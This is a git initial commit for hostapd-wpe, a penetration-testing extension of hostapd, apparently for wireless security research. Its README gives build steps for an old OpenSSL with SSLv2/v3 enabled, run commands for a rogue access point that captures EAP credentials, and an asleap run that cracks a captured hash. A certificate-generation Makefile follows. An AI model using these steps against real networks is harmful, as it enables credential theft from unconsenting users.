initial commit

README

@@ -0,0 +1,91 @@
+hostapd-wpe (Wireless Pwnage Edition)
+by brad antoniewicz
+[email protected]
+
+------------------------------------------
+
+The current hostapd-wpe.patch is for: hostapd-1.0.tar.gz
+
+hostapd-wpe is an extension of FreeRADIUS-WPE 
+(http://www.willhackforsushi.com/?page_id=37) and JoMo-Kun's 
+HostAP karma patch (http://www.foofus.net/?page_id=115). 
+
+Since FreeRADIUS does not support EAP-FAST in a non-development
+way, I decided to modify hostapd to facilitate AP impersonation 
+attacks with EAP-FAST Phase 0. It'll also work with all of 
+the Karma EAP-Types and more. 
+
+Currently it supports:
+	EAP-FAST (Phase 0)
+	PEAP MSCHAPv2
+
+TODO:
+	Logging to file, test more EAP-Types 
+
+Building 
+---------
+
+	hostapd does not support EAP-FAST out of the box. Instead you'll have 
+	to install a OpenSSL version > 1.0.0 and apply the hostapd-wpe patch
+	to make it all work. 
+
+	hostapd-wpe is assumed to be in /root/hostapd-wpe if you put it 
+	anywhere else, you'll need to change the config files, etc..
+
+	git clone https://github.com/OpenSecurityResearch/hostapd-wpe 
+
+	Here are the build steps for OpenSSL (on BT5R2):
+
+	Note: This will overwrite any previous OpenSSL instances and may
+	break things.. 
+
+	wget https://www.openssl.org/source/openssl-1.0.1c.tar.gz
+	tar -zxf openssl-1.0.1c.tar.gz
+	cd openssl-1.0.1c
+	./config --prefix=/usr --libdir=lib no-idea shared zlib enable-tlsext enable-rc5 enable-ssl2 enable-ssl3 enable-tls1
+	make depend
+	make
+	make install
+
+	Now apply the hostapd-wpe.patch:
+
+	wget http://hostap.epitest.fi/releases/hostapd-1.0.tar.gz
+	tar -zxf hostapd-1.0.tar.gz
+	cd hostapd-1.0
+	patch -p1 < /root/hostapd-wpe/hostapd-wpe.patch 
+	make
+	make install
+
+	I copied the certs directory and scripts from FreeRADIUS to ease that 
+	portion of things. You should just be able to:
+
+	cd /root/hostapd-wpe/certs
+	./bootstrap
+
+
+Running:
+----------------
+
+	With all of that complete, you can run hostapd. When testing, use either
+	hostapd-local-eapfast.conf or hostapd-local-peap.conf which will
+	create an AP and output the credentials. For instance:
+
+	hostapd -d ~/hostapd-wpe/hostapd-local-eapfast.conf
+
+	Look in the output for the username/challenge/response. I'll add
+	file logging soon. 
+
+	for instance here are the EAP-FAST Phase 0 creds from stdout:
+
+	username: jdslfkjs
+	challenge: bc:87:6c:48:37:d3:92:6e
+	response: 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0
+
+	and as always, we feed them into asleap to crack:
+
+	# asleap -C bc:87:6c:48:37:d3:92:6e -R 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 -W wordlist 
+	asleap 2.2 - actively recover LEAP/PPTP passwords. <[email protected]>
+	hash bytes:        b1ca
+	NT hash:           e614b958df9df49ec094b8730f0bb1ca
+	password:          bradtest
+

certs/Makefile

@@ -0,0 +1,138 @@
+######################################################################
+#
+#	Make file to be installed in /etc/raddb/certs to enable
+#	the easy creation of certificates.
+#
+#	See the README file in this directory for more information.
+#	
+#	$Id$
+#
+######################################################################
+
+DH_KEY_SIZE	= 1024
+
+#
+#  Set the passwords
+#
+PASSWORD_SERVER	= `grep output_password server.cnf | sed 's/.*=//;s/^ *//'`
+PASSWORD_CA	= `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'`
+PASSWORD_CLIENT	= `grep output_password client.cnf | sed 's/.*=//;s/^ *//'`
+
+USER_NAME	= `grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//'`
+CA_DEFAULT_DAYS = `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'`
+
+######################################################################
+#
+#  Make the necessary files, but not client certificates.
+#
+######################################################################
+.PHONY: all
+all: index.txt serial dh random server ca
+
+.PHONY: client
+client: client.pem
+
+.PHONY: ca
+ca: ca.der
+
+.PHONY: server
+server: server.pem server.vrfy
+
+######################################################################
+#
+#  Diffie-Hellman parameters
+#
+######################################################################
+dh:
+	openssl dhparam -out dh $(DH_KEY_SIZE)
+
+######################################################################
+#
+#  Create a new self-signed CA certificate
+#
+######################################################################
+ca.key ca.pem: ca.cnf
+	openssl req -new -x509 -keyout ca.key -out ca.pem \
+		-days $(CA_DEFAULT_DAYS) -config ./ca.cnf
+
+ca.der: ca.pem
+	openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der
+
+######################################################################
+#
+#  Create a new server certificate, signed by the above CA.
+#
+######################################################################
+server.csr server.key: server.cnf
+	openssl req -new  -out server.csr -keyout server.key -config ./server.cnf
+
+server.crt: server.csr ca.key ca.pem
+	openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr  -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf
+
+server.p12: server.crt
+	openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12  -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER)
+
+server.pem: server.p12
+	openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER)
+
+.PHONY: server.vrfy
+server.vrfy: ca.pem
+	openssl verify -CAfile ca.pem server.pem
+
+######################################################################
+#
+#  Create a new client certificate, signed by the the above server
+#  certificate.
+#
+######################################################################
+client.csr client.key: client.cnf
+	openssl req -new  -out client.csr -keyout client.key -config ./client.cnf
+
+client.crt: client.csr ca.pem ca.key
+	openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr  -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
+
+client.p12: client.crt
+	openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12  -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT)
+
+client.pem: client.p12
+	openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT)
+	cp client.pem $(USER_NAME).pem
+
+.PHONY: client.vrfy
+client.vrfy: server.pem client.pem 
+	c_rehash .
+	openssl verify -CApath . client.pem
+
+######################################################################
+#
+#  Miscellaneous rules.
+#
+######################################################################
+index.txt:
+	@touch index.txt
+
+serial:
+	@echo '01' > serial
+
+random:
+	@if [ -c /dev/urandom ] ; then \
+		dd if=/dev/urandom of=./random count=10 >/dev/null 2>&1; \
+	else \
+		date > ./random; \
+	fi
+
+print:
+	openssl x509 -text -in server.crt
+
+printca:
+	openssl x509 -text -in ca.pem
+
+clean:
+	@rm -f *~ *old client.csr client.key client.crt client.p12 client.pem
+
+#
+#	Make a target that people won't run too often.
+#
+destroycerts:
+	rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \
+			serial* random *\.0 *\.1